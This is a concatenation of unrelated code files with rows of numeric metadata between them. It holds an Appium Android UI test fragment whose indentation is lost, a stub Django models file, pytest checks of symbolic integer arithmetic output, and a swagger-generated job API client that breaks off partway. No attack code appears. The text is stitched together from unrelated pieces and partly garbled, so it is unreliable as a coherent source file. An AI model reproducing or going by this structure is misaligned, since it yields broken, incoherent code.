wd.find_element_by_xpath("//android.widget.LinearLayout[@index='2']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='1']/android.widget.Button[@index='1']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.RelativeLayout[@index='0']/android.widget.LinearLayout[@index='2']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(10)
wd.find_element_by_xpath("//android.widget.RelativeLayout[@index='0']/android.widget.ImageView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
if try_time < 0:
if p:
p.terminate()
p.wait()
wd.quit()
p = subprocess.Popen(["C:\\Testwa\\Generator\\TestwaServer\\node.exe", "C:\\Testwa\\Generator\\TestwaServer\\build\\lib\\main.js"])
sleep(10)
desired_caps = {}
desired_caps['platformName'] = 'Android'
desired_caps['platformVersion'] = '5.1'
desired_caps['deviceName'] = 'MT66-2WA-8D00375'
desired_caps['unicodeKeyboard'] = True
desired_caps['resetKeyboard'] = True
desired_caps['app'] = PATH('C:/Users/Administrator/Downloads/pda-debug.apk')
desired_caps['appPackage'] = 'com.chanjet.tpluspda'
desired_caps['appActivity'] = 'com.chanjet.tpluspda.activity.login.GuideActivity'
desired_caps['appWaitPackage'] = 'com.chanjet.tpluspda'
#desired_caps['appWaitActivity'] = 'com.chanjet.tpluspda.activity.login.GuideActivity'
desired_caps['newCommandTimeout'] = 3600
desired_caps['noReset'] = True
self.driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)
wd = self.driver
wd.implicitly_wait(60)
touchAction = TouchAction(wd)
print 'restart...'
if __name__ == '__main__':
    # Run the recorded scenario directly; verbosity=2 prints one line per test.
    unittest.main(verbosity=2)
| 48.808081
| 253
| 0.563397
| 1,605
| 14,496
| 4.932087
| 0.094704
| 0.157655
| 0.180015
| 0.216018
| 0.89856
| 0.893128
| 0.88858
| 0.874053
| 0.873926
| 0.873926
| 0
| 0.024645
| 0.300221
| 14,496
| 296
| 254
| 48.972973
| 0.755718
| 0.048772
| 0
| 0.850746
| 0
| 0.085821
| 0.325686
| 0.291128
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.033582
| null | null | 0.003731
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
9427f49da1e9c349fa7624c02e63d5f87cae63d7
| 175
|
py
|
Python
|
japps/models.py
|
aliceminotto/cyverse_website
|
48432341b269059036c4a1b761a4cace2ffff92c
|
[
"MIT"
] | 1
|
2017-04-22T11:46:37.000Z
|
2017-04-22T11:46:37.000Z
|
japps/models.py
|
cyverseuk/cyverse_website
|
48432341b269059036c4a1b761a4cace2ffff92c
|
[
"MIT"
] | 2
|
2020-02-12T10:35:17.000Z
|
2021-06-10T19:09:16.000Z
|
japps/models.py
|
cyverseuk/cyverse_website
|
48432341b269059036c4a1b761a4cace2ffff92c
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.core.validators import RegexValidator
#@python_2_unicode_compatible
| 19.444444
| 61
| 0.862857
| 24
| 175
| 6.041667
| 0.583333
| 0.206897
| 0.193103
| 0.331034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012658
| 0.097143
| 175
| 8
| 62
| 21.875
| 0.905063
| 0.16
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
84bf1ad8ac0d6137fa5c5ccfea241dfcafc0c1da
| 15,596
|
py
|
Python
|
symarray/symarray/calculus/tests/test_integers.py
|
costrouc/uarray
|
c3c42147181a88265942ad5f9cf439467f746782
|
[
"BSD-3-Clause"
] | null | null | null |
symarray/symarray/calculus/tests/test_integers.py
|
costrouc/uarray
|
c3c42147181a88265942ad5f9cf439467f746782
|
[
"BSD-3-Clause"
] | null | null | null |
symarray/symarray/calculus/tests/test_integers.py
|
costrouc/uarray
|
c3c42147181a88265942ad5f9cf439467f746782
|
[
"BSD-3-Clause"
] | null | null | null |
from symarray.calculus.integers import Integer, Int
def test_integer():
    """str() forms produced by symbolic ``Integer`` arithmetic."""
    a = Integer('a')
    b = Integer('b')
    c = Integer('c')
    d = Integer('d')
    # (expression, expected printed form), in the original assertion order.
    cases = [
        (a, 'a'),
        (+a, 'a'),
        (a + b, 'a + b'),
        (a + 1, '1 + a'),
        (1 + a, '1 + a'),
        (a + 0, 'a'),
        (a + a, '2 * a'),
        (a + a + a, '3 * a'),
        (a + a + b, '2 * a + b'),
        (a + b + a, '2 * a + b'),
        ((a + b) + (c), 'a + b + c'),
        ((a) + (b + c), 'a + b + c'),
        ((a + b) + (c + d), 'a + b + c + d'),
        ((a + b) + (c + c), 'a + b + 2 * c'),
        ((a + a) + (c + d), '2 * a + c + d'),
        ((a + b) + 2, '2 + a + b'),
        (-a, '-a'),
        (a - a, '0'),
        (a - b, 'a - b'),
        ((a + b) - 2, '-2 + a + b'),
        (2 + (a + b), '2 + a + b'),
        (-2 + (a + b), '-2 + a + b'),
        ((a + b) - (c + d), 'a + b - c - d'),
        ((a + b) - (c + c), 'a + b - 2 * c'),
        (a - (c + d), 'a - c - d'),
        ((a + b) - (c + c - d), 'a + b - 2 * c + d'),
        (a * 2, '2 * a'),
        (2 * a, '2 * a'),
        (-2 * a, '-2 * a'),
        (1 * a, 'a'),
        (-1 * a, '-a'),
        (a * 2 * 3, '6 * a'),
        (2 * a * 3, '6 * a'),
        (a * b, 'a * b'),
        (a * a, 'a ** 2'),
        (a / a, '1'),
        (a ** 2, 'a ** 2'),
        (a * b * 2, '2 * a * b'),
        (2 * a * b, '2 * a * b'),
        (a * b * c, 'a * b * c'),
        (a * (b * c), 'a * b * c'),
        ((a + b) * c, 'a * c + b * c'),
        (c * (a + b), 'a * c + b * c'),
        ((a + b) * (c + d), 'a * c + a * d + b * c + b * d'),
        ((a + b) * (a + b), '2 * a * b + a ** 2 + b ** 2'),
        ((a + b) ** 2, '2 * a * b + a ** 2 + b ** 2'),
        ((a + b) ** 2 * (a + b), '3 * a * b ** 2 + 3 * a ** 2 * b + a ** 3 + b ** 3'),
        ((a + b) * (a + b) ** 2, '3 * a * b ** 2 + 3 * a ** 2 * b + a ** 3 + b ** 3'),
        ((a + b) ** 3, '3 * a * b ** 2 + 3 * a ** 2 * b + a ** 3 + b ** 3'),
        ((a + b) * 2, '2 * a + 2 * b'),
        ((a + b) * c * 2, '2 * a * c + 2 * b * c'),
        ((a * b) * 2, '2 * a * b'),
        (Int(2) * (a * b), '2 * a * b'),
        ((a * b) ** 2, 'a ** 2 * b ** 2'),
        ((a * b) ** (Int(1) / 2), '(a * b) ** 1/2'),
    ]
    for expr, expected in cases:
        assert str(expr) == expected, repr(expr)
def test_number():
    """Arithmetic between two ``Int`` instances and between Int and int."""
    two = Int(2)
    three = Int(3)
    assert str(+two) == '2'
    assert str(-two) == '-2'
    # Every binary operation is exercised three ways -- Int<op>Int,
    # Int<op>int and int<op>Int -- and all must print the same result.
    for res in (two + three, two + 3, 2 + three):
        assert str(res) == '5'
    for res in (two - three, two - 3, 2 - three):
        assert str(res) == '-1'
    for res in (two * three, two * 3, 2 * three):
        assert str(res) == '6'
    for res in (two / three, two / 3, 2 / three):
        assert str(res) == '2/3'
    for res in (two ** three, two ** 3, 2 ** three):
        assert str(res) == '8'
def test_number_calculus():
    """Mixed arithmetic between a concrete ``Int`` and symbolic ``Integer``s.

    Each operation is checked both with the Int instance ``n`` and with the
    equivalent plain Python literal ``2`` on either side of the operator,
    and both orderings must print the same normalized form.
    """
    n = Int(2)
    a = Integer('a')
    b = Integer('b')
    # --- single symbol combined with a number ---
    assert str(+a)=='a'
    assert str(-a)=='-a'
    assert str(a + n)=='2 + a'
    assert str(a + 2)=='2 + a'
    assert str(n + a)=='2 + a'
    assert str(2 + a)=='2 + a'
    assert str(a - n)=='-2 + a'
    assert str(a - 2)=='-2 + a'
    assert str(n - a)=='2 - a'
    assert str(2 - a)=='2 - a'
    assert str(a * n)=='2 * a',repr(a * n)
    assert str(a * 2)=='2 * a'
    assert str(n * a)=='2 * a'
    assert str(2 * a)=='2 * a'
    assert str(a / n)=='1/2 * a'
    assert str(a / 2)=='1/2 * a'
    assert str(a ** n)=='a ** 2'
    assert str(a ** 2)=='a ** 2'
    assert str(n ** a)=='2 ** a'
    assert str(2 ** a)=='2 ** a'
    # --- c = a + a: a term with an integer coefficient ---
    c = a + a
    assert str(+c) == '2 * a'
    assert str(-c) == '-2 * a'
    assert str(c + n) == '2 + 2 * a'
    assert str(n + c) == str (c+n)
    assert str(c + 2) == str (c+n)
    assert str(2 + c) == str (c+n)
    assert str(c - n) == '-2 + 2 * a'
    assert str(c - 2) == str (c-n)
    assert str(n - c) == '2 - 2 * a'
    assert str(2 - c) == str (n-c)
    assert str(c * n) == '4 * a'
    assert str(c * 2) == str(c * n)
    assert str(n * c) == str(c * n)
    assert str(2 * c) == str(c * n)
    assert str(c / n) == 'a'
    assert str(c / 2) == str(c / n)
    assert str(n / c) in ['a ** -1', 'a ** (-1)'], repr(n/c)
    assert str(2 / c) == str(n / c)
    assert str(c ** n) == '4 * a ** 2'
    assert str(c ** 2) == str(c ** n)
    assert str(n ** c) == '2 ** (2 * a)'
    assert str(n ** c) == str(2 ** c)
    # --- c = a + b: a sum of two distinct symbols ---
    c = a + b
    assert str(+c) == 'a + b'
    assert str(-c) == '-a - b'
    assert str(c + n) == '2 + a + b'
    assert str(n + c) == str(c + n)
    assert str(c + 2) == str(c + n)
    assert str(2 + c) == str(c + n)
    assert str(c - n) == '-2 + a + b'
    assert str(c - 2) == str(c - n)
    assert str(n - c) == '2 - a - b'
    assert str(2 - c) == str(n - c)
    assert str(c * n) == '2 * a + 2 * b'
    assert str(c * 2) == str(c * n)
    assert str(n * c) == str(c * n)
    assert str(2 * c) == str(c * n)
    assert str(c / n) == '1/2 * a + 1/2 * b'
    assert str(c / 2) == str(c / n)
    assert str(n / c) in ['2 * (a + b) ** -1', '2 * (a + b) ** (-1)'],repr((n/c))
    assert str(2 / c) == str(n / c)
    assert str(c ** n) == '2 * a * b + a ** 2 + b ** 2'
    assert str(c ** 2) == str(c ** n)
    assert str(n ** c) == '2 ** (a + b)'
    assert str(n ** c) == str(2 ** c)
    # --- c = a * b: a product of two distinct symbols ---
    c = a * b
    assert str(+c) == 'a * b'
    assert str(-c) == '-a * b'
    assert str(c + n) == '2 + a * b'
    assert str(c + 2) == str(c + n)
    assert str(n + c) == str(c + n)
    assert str(2 + c) == str(c + n)
    assert str(c - n) == '-2 + a * b'
    assert str(c - 2) == str(c - n)
    assert str(n - c) == '2 - a * b'
    assert str(2 - c) == str(n - c)
    assert str(c * n) == '2 * a * b'
    assert str(c * 2) == str(c * n)
    assert str(n * c) == str(c * n)
    assert str(2 * c) == str(c * n)
    assert str(c / n) == '1/2 * a * b'
    assert str(c / 2) == str(c / n)
    assert str(n / c) in ['2 * a ** -1 * b ** -1', '2 * a ** (-1) * b ** (-1)']
    assert str(2 / c) == str(n / c)
    assert str (c ** n) == 'a ** 2 * b ** 2'
    assert str (c ** 2) == str (c**n)
    assert str (n ** c) == '2 ** (a * b)'
    assert str (2 ** c) == str (n ** c)
    # --- c = a * a: a symbol squared ---
    c = a * a
    assert str(+c) == 'a ** 2'
    assert str(-c) == '-a ** 2'
    assert str(c + n) == '2 + a ** 2'
    assert str(c + 2) == str(c + n)
    assert str(n + c) == str(c + n)
    assert str(2 + c) == str(c + n)
    assert str(c - n) == '-2 + a ** 2'
    assert str(c - 2) == str(c - n)
    assert str(n - c) == '2 - a ** 2'
    assert str(2 - c) == str(n - c)
    assert str(c * n) == '2 * a ** 2'
    assert str(c * 2) == str(c * n)
    assert str(n * c) == str(c * n)
    assert str(2 * c) == str(c * n)
    assert str(c / n) == '1/2 * a ** 2'
    assert str(c / 2) == str(c / n)
    assert str(n / c) in ['2 * a ** -2', '2 * a ** (-2)']
    assert str(2 / c) == str(n / c)
    assert str (c ** n) == 'a ** 4'
    assert str (c ** 2) == str (c**n)
    assert str (n ** c) == '2 ** (a ** 2)'
    assert str (2 ** c) == str (n ** c)
def test_integer_calculus():
    """Arithmetic between a single symbol ``a`` and compound expressions.

    ``x`` is rebound in turn to a sum, a coefficient term, a product and a
    power, and each binary operation against ``a`` is checked in both
    operand orders.
    """
    a = Integer('a')
    b = Integer('b')
    c = Integer('c')
    # --- symbol vs symbol ---
    assert str(a + b) == 'a + b'
    assert str(a + a) == '2 * a'
    assert str(a - b) == 'a - b'
    assert str(a - a) == '0'
    assert str(a * b) == 'a * b'
    assert str(a * a) == 'a ** 2'
    assert str(a / b) in ['a * b ** -1', 'a * b ** (-1)']
    assert str(b / a) in ['a ** -1 * b', 'a ** (-1) * b']
    assert str(a ** b) == 'a ** b',repr(a ** b)
    # --- x = b + c: sum of two symbols ---
    x = b + c
    assert str(a + x) == 'a + b + c'
    assert str(x + a) == str(a + x)
    assert str(a - x) == 'a - b - c'
    assert str(x - a) == '-a + b + c'
    assert str(a * x) == 'a * b + a * c'
    assert str(x * a) == str(a * x)
    assert str(a / x) in ['a * (b + c) ** -1', 'a * (b + c) ** (-1)']
    assert str (x / a) in ['a ** -1 * b + a ** -1 * c', 'a ** (-1) * b + a ** (-1) * c']
    assert str(a ** x) == 'a ** (b + c)'
    assert str(x ** a) == '(b + c) ** a'
    # --- x = b + b: coefficient term 2 * b ---
    x = b + b
    assert str(a + x) == 'a + 2 * b'
    assert str(x + a) == str(a + x)
    assert str(a - x) == 'a - 2 * b'
    assert str(x - a) == '-a + 2 * b'
    assert str(a * x) == '2 * a * b'
    assert str(x * a) == str(a * x)
    assert str(a / x) in ['1/2 * a * b ** -1', '1/2 * a * b ** (-1)']
    assert str (x / a) in ['2 * a ** -1 * b', '2 * a ** (-1) * b']
    assert str(a ** x) == 'a ** (2 * b)'
    assert str(x ** a) == '(2 * b) ** a'
    # --- x = b * c: product of two symbols ---
    x = b * c
    assert str(a + x) == 'a + b * c'
    assert str(x + a) == str(a + x)
    assert str(a - x) == 'a - b * c'
    assert str(x - a) == '-a + b * c'
    assert str(a * x) == 'a * b * c'
    assert str(x * a) == str(a * x)
    assert str(a / x) in ['a * b ** -1 * c ** -1', 'a * b ** (-1) * c ** (-1)']
    assert str (x / a) in ['a ** -1 * b * c', 'a ** (-1) * b * c']
    assert str(a ** x) == 'a ** (b * c)'
    assert str(x ** a) == '(b * c) ** a'
    # --- x = b * b: symbol squared ---
    x = b * b
    assert str(a + x) == 'a + b ** 2'
    assert str(x + a) == str(a + x)
    assert str(a - x) == 'a - b ** 2'
    assert str(x - a) == '-a + b ** 2'
    assert str(a * x) == 'a * b ** 2'
    assert str(x * a) == str(a * x)
    assert str(a / x) in ['a * b ** -2', 'a * b ** (-2)']
    assert str (x / a) in ['a ** -1 * b ** 2', 'a ** (-1) * b ** 2']
    assert str(a ** x) == 'a ** (b ** 2)'
    assert str(x ** a) in ['b ** (2 * a)', '(b ** 2) ** a']
def test_terms_calculus():
    """Arithmetic between *sum* expressions (terms).

    ``x`` is a sum (``a + b`` then ``a + a``) and ``y`` iterates over the
    other compound shapes (sum, coefficient term, product, power); every
    binary operation between them is checked.
    """
    a = Integer('a')
    b = Integer('b')
    c = Integer('c')
    d = Integer('d')
    # --- x = a + b combined with itself ---
    x = a + b
    assert str (x + x) == '2 * a + 2 * b'
    assert str (x - x) == '0'
    assert str (x * x) == '2 * a * b + a ** 2 + b ** 2'
    assert str (x / x) == '1'
    assert str (x ** x) == '(a + b) ** (a + b)'
    # --- (a + b) vs (c + d) ---
    y = c + d
    assert str (x + y) == 'a + b + c + d'
    assert str (y + x) == str (x + y)
    assert str (x - y) == 'a + b - c - d'
    assert str (y - x) == '-a - b + c + d'
    assert str (x * y) == 'a * c + a * d + b * c + b * d'
    assert str (x / y) in ['(a + b) * (c + d) ** -1', '(a + b) * (c + d) ** (-1)', 'a * (c + d) ** (-1) + b * (c + d) ** (-1)']
    assert str (x ** y) == '(a + b) ** (c + d)'
    # --- (a + b) vs (c * d) ---
    y = c * d
    assert str (x + y) == 'a + b + c * d'
    assert str (y + x) == str (x + y)
    assert str (x - y) == 'a + b - c * d'
    assert str (y - x) == '-a - b + c * d'
    assert str (x * y) == 'a * c * d + b * c * d'
    assert str (x / y) in ['a * c ** -1 * d ** -1 + b * c ** -1 * d ** -1', 'a * c ** (-1) * d ** (-1) + b * c ** (-1) * d ** (-1)']
    assert str (x ** y) == '(a + b) ** (c * d)'
    assert str (y ** x) == '(c * d) ** (a + b)'
    # --- (a + b) vs (c ** 2) ---
    y = c * c
    assert str (x + y) == 'a + b + c ** 2'
    assert str (y + x) == str (x + y)
    assert str (x - y) == 'a + b - c ** 2'
    assert str (y - x) == '-a - b + c ** 2'
    assert str (x * y) == 'a * c ** 2 + b * c ** 2'
    assert str (x / y) in ['a * c ** -2 + b * c ** -2', 'a * c ** (-2) + b * c ** (-2)']
    assert str (x ** y) == '(a + b) ** (c ** 2)'
    assert str (y ** x) in ['c ** (2 * a + 2 * b)', '(c ** 2) ** (a + b)']
    # --- x = a + a (coefficient term 2 * a) combined with itself ---
    x = a + a
    y = c + d
    assert str (x + x) == '4 * a'
    assert str (x - x) == '0'
    assert str (x * x) == '4 * a ** 2'
    assert str (x / x) == '1',repr((x / x, x, (1/x)))
    assert str (x ** x) == '(2 * a) ** (2 * a)'
    # --- (2 * a) vs (c + d) ---
    assert str (x + y) == '2 * a + c + d'
    assert str (y + x) == str (x + y)
    assert str (x - y) == '2 * a - c - d'
    assert str (y - x) == '-2 * a + c + d'
    assert str (x * y) == '2 * a * c + 2 * a * d'
    assert str (x / y) in ['2 * a * (c + d) ** -1', '2 * a * (c + d) ** (-1)']
    assert str (x ** y) == '(2 * a) ** (c + d)'
    assert str (y ** x) == '(c + d) ** (2 * a)'
    # --- (2 * a) vs (2 * c) ---
    y = c + c
    assert str (x + y) == '2 * a + 2 * c'
    assert str (y + x) == str (x + y)
    assert str (x - y) == '2 * a - 2 * c'
    assert str (y - x) == '-2 * a + 2 * c'
    assert str (x * y) == '4 * a * c'
    assert str (x / y) in ['a * c ** -1', 'a * c ** (-1)']
    assert str (x ** y) == '(2 * a) ** (2 * c)'
    assert str (y ** x) == '(2 * c) ** (2 * a)'
    # --- (2 * a) vs (c * d) ---
    y = c * d
    assert str (x + y) == '2 * a + c * d'
    assert str (y + x) == str (x + y)
    assert str (x - y) == '2 * a - c * d'
    assert str (y - x) == '-2 * a + c * d'
    assert str (x * y) == '2 * a * c * d'
    assert str (x / y) in ['2 * a * c ** -1 * d ** -1', '2 * a * c ** (-1) * d ** (-1)']
    assert str (x ** y) == '(2 * a) ** (c * d)'
    assert str (y ** x) == '(c * d) ** (2 * a)'
    # --- (2 * a) vs (c ** 2) ---
    y = c * c
    assert str (x + y) == '2 * a + c ** 2'
    assert str (y + x) == str (x + y)
    assert str (x - y) == '2 * a - c ** 2'
    assert str (y - x) == '-2 * a + c ** 2'
    assert str (x * y) == '2 * a * c ** 2'
    assert str (x / y) in ['2 * a * c ** -2', '2 * a * c ** (-2)']
    assert str (x ** y) == '(2 * a) ** (c ** 2)'
    assert str (y ** x) in ['c ** (4 * a)','(c ** 2) ** (2 * a)']
def test_factors_calculus ():
    """Arithmetic between *product* expressions (factors).

    ``x`` is a product (``a * b`` then ``a * a``) and ``y`` iterates over
    products and powers; every binary operation between them is checked.
    Several ``in [...]`` checks accept alternative but equivalent printed
    forms for negative/parenthesized exponents.
    """
    a = Integer('a')
    b = Integer('b')
    c = Integer('c')
    d = Integer('d')
    # --- x = a * b combined with itself ---
    x = a * b
    assert str (x + x) == '2 * a * b'
    assert str (x - x) == '0'
    assert str (x * x) == 'a ** 2 * b ** 2'
    assert str (x / x) == '1'
    assert str (x ** x) == '(a * b) ** (a * b)'
    # --- (a * b) vs (c * d) ---
    y = c * d
    assert str (x + y) == 'a * b + c * d'
    assert str (y + x) == str (x + y)
    assert str (x - y) == 'a * b - c * d'
    assert str (y - x) == '-a * b + c * d'
    assert str (x * y) == 'a * b * c * d'
    assert str (x / y) in ['a * b * c ** -1 * d ** -1', 'a * b * c ** (-1) * d ** (-1)']
    assert str (x ** y) == '(a * b) ** (c * d)'
    # --- (a * b) vs (c ** 2) ---
    y = c * c
    assert str (x + y) == 'a * b + c ** 2'
    assert str (y + x) == str (x + y)
    assert str (x - y) == 'a * b - c ** 2'
    assert str (y - x) == '-a * b + c ** 2'
    assert str (x * y) == 'a * b * c ** 2'
    assert str (y * x) == str(x * y)
    assert str (x / y) in ['a * b * c ** -2', 'a * b * c ** (-2)']
    assert str (y / x) in ['a ** -1 * b ** -1 * c ** 2', 'a ** (-1) * b ** (-1) * c ** 2']
    assert str (x ** y) in ['(a * b) ** (c ** 2)', '(a * b) ** c ** 2']
    assert str (y ** x) in ['c ** (2 * a * b)', '(c ** 2) ** (a * b)', 'c ** 2 ** (a * b)',
                            ]
    # --- x = a * a (a symbol squared) combined with itself ---
    x = a * a
    assert str (x + x) == '2 * a ** 2'
    assert str (x - x) == '0'
    assert str (x * x) == 'a ** 4'
    assert str (x / x) == '1'
    assert str (x ** x) in ['a ** (2 * a ** 2)', '(a ** 2) ** (a ** 2)', 'a ** 2 ** a ** 2',
                            ]
    # --- (a ** 2) vs (c * d) ---
    y = c * d
    assert str (x + y) == 'a ** 2 + c * d'
    assert str (y + x) == str (x + y)
    assert str (x - y) == 'a ** 2 - c * d'
    assert str (y - x) == '-a ** 2 + c * d'
    assert str (x * y) == 'a ** 2 * c * d'
    assert str (x / y) in ['a ** 2 * c ** -1 * d ** -1', 'a ** 2 * c ** (-1) * d ** (-1)']
    assert str (x ** y) in ['a ** (2 * c * d)', '(a ** 2) ** (c * d)', 'a ** 2 ** (c * d)',
                            ]
    # --- (a ** 2) vs (c ** 2) ---
    y = c * c
    assert str (x + y) == 'a ** 2 + c ** 2'
    assert str (y + x) == str (x + y)
    assert str (x - y) == 'a ** 2 - c ** 2'
    assert str (y - x) == '-a ** 2 + c ** 2'
    assert str (x * y) == 'a ** 2 * c ** 2'
    assert str (y * x) == str(x * y)
    assert str (x / y) in ['a ** 2 * c ** -2', 'a ** 2 * c ** (-2)']
    assert str (y / x) in ['a ** -2 * c ** 2', 'a ** (-2) * c ** 2']
    assert str (x ** y) in ['a ** (2 * c ** 2)', '(a ** 2) ** (c ** 2)', 'a ** 2 ** c ** 2',
                            ]
    assert str (y ** x) in ['c ** (2 * a ** 2)','(c ** 2) ** (a ** 2)','c ** 2 ** a ** 2',
                            ]
| 33.684665
| 132
| 0.364645
| 2,880
| 15,596
| 1.971181
| 0.011111
| 0.535846
| 0.167342
| 0.10657
| 0.946451
| 0.909283
| 0.868769
| 0.848159
| 0.806236
| 0.770654
| 0
| 0.047733
| 0.357912
| 15,596
| 462
| 133
| 33.757576
| 0.519173
| 0
| 0
| 0.323155
| 0
| 0.015267
| 0.251764
| 0
| 0
| 0
| 0
| 0
| 0.860051
| 1
| 0.015267
| false
| 0
| 0.002545
| 0
| 0.017812
| 0
| 0
| 0
| 1
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
84d8a03c0d9efb0bc5c608c6d6750e15eb25619b
| 37,624
|
py
|
Python
|
leiaapi/generated/api/job_api.py
|
labinnovationdocapost/leia-api-python-sdk
|
6001dce68362d4e836b57e52d4da17710f25ed12
|
[
"MIT"
] | null | null | null |
leiaapi/generated/api/job_api.py
|
labinnovationdocapost/leia-api-python-sdk
|
6001dce68362d4e836b57e52d4da17710f25ed12
|
[
"MIT"
] | null | null | null |
leiaapi/generated/api/job_api.py
|
labinnovationdocapost/leia-api-python-sdk
|
6001dce68362d4e836b57e52d4da17710f25ed12
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
LEIA RESTful API for AI
Leia API # noqa: E501
OpenAPI spec version: 1.0.0
Contact: contact@leia.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from leiaapi.generated.api_client import ApiClient
class JobApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Create the API wrapper.

    :param api_client: optional pre-configured ApiClient; when omitted a
        default ApiClient() is constructed.
    """
    self.api_client = ApiClient() if api_client is None else api_client
def cancel_job(self, token, job_id, **kwargs):  # noqa: E501
    """Cancels a job in Leia API  # noqa: E501

    Cancels a job in Leia API (This will not really delete it, just mark it as cancelled, so dependent jobs will fail)  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.cancel_job(token, job_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str token: The login token obtained via GET /login/{api_key} (required)
    :param str job_id: The id of the job to delete (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper always get the payload only; the
    # *_with_http_info variant carries the actual request logic.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # Asynchronous: hand the request thread straight back.
        return self.cancel_job_with_http_info(token, job_id, **kwargs)  # noqa: E501
    # Synchronous: unwrap and return the response data.
    data = self.cancel_job_with_http_info(token, job_id, **kwargs)  # noqa: E501
    return data
def cancel_job_with_http_info(self, token, job_id, **kwargs):  # noqa: E501
    """Cancels a job in Leia API  # noqa: E501

    Cancels a job in Leia API (This will not really delete it, just mark it as cancelled, so dependent jobs will fail)  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.cancel_job_with_http_info(token, job_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str token: The login token obtained via GET /login/{api_key} (required)
    :param str job_id: The id of the job to delete (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Parameters understood by this endpoint plus the generic transport
    # options accepted by every generated method.
    all_params = ['token', 'job_id']  # noqa: E501
    all_params.extend(['async_req', '_return_http_data_only',
                       '_preload_content', '_request_timeout'])

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method cancel_job" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameters are set (token and job_id are
    # positional, so they are always present in params; only None-ness
    # needs checking)
    if params.get('token') is None:
        raise ValueError("Missing the required parameter `token` when calling `cancel_job`")  # noqa: E501
    if params.get('job_id') is None:
        raise ValueError("Missing the required parameter `job_id` when calling `cancel_job`")  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'job_id' in params:
        path_params['job_id'] = params['job_id']  # noqa: E501

    query_params = []

    header_params = {}
    if 'token' in params:
        header_params['token'] = params['token']  # noqa: E501

    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/job/{job_id}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def create_conditional_job(self, token, execute_after_id, **kwargs):  # noqa: E501
    """Asynchronously and conditionally applies model(s) on documents.

    Delegates to ``create_conditional_job_with_http_info``. Synchronous
    by default; pass ``async_req=True`` to get the request thread back
    instead of the response data.

    :param async_req bool
    :param str token: The login token obtained via GET /login/{api_key} (required)
    :param str execute_after_id: Id of a job that must reach PROCESSED before this one starts (required)
    :param ConditionalBody body: Rules choosing which model(s) to apply
    :param str callback_url: URL POSTed with the Job when it reaches PROCESSED/FAILED/CANCELED
    :param bool block_processing: If true, blocks processing until /job/{id}/start is called
    :return: Job
        If the method is called asynchronously, returns the request thread.
    """
    # Always strip the HTTP envelope so callers receive the data directly.
    kwargs['_return_http_data_only'] = True
    # Both sync and async paths delegate identically: in async mode the
    # delegate already hands back the request thread.
    return self.create_conditional_job_with_http_info(token, execute_after_id, **kwargs)  # noqa: E501
def create_conditional_job_with_http_info(self, token, execute_after_id, **kwargs):  # noqa: E501
    """Asynchronously and conditionally applies model(s) on documents.

    Runs one or more lists of jobs on accessible documents, chosen by the
    ``rules`` in the request body depending on the result of the
    ``execute_after_id`` job. Synchronous by default; pass
    ``async_req=True`` for the request thread.

    :param async_req bool
    :param str token: The login token obtained via GET /login/{api_key} (required)
    :param str execute_after_id: Id of a job that must reach PROCESSED before this one starts (required)
    :param ConditionalBody body: Rules choosing which model(s) to apply
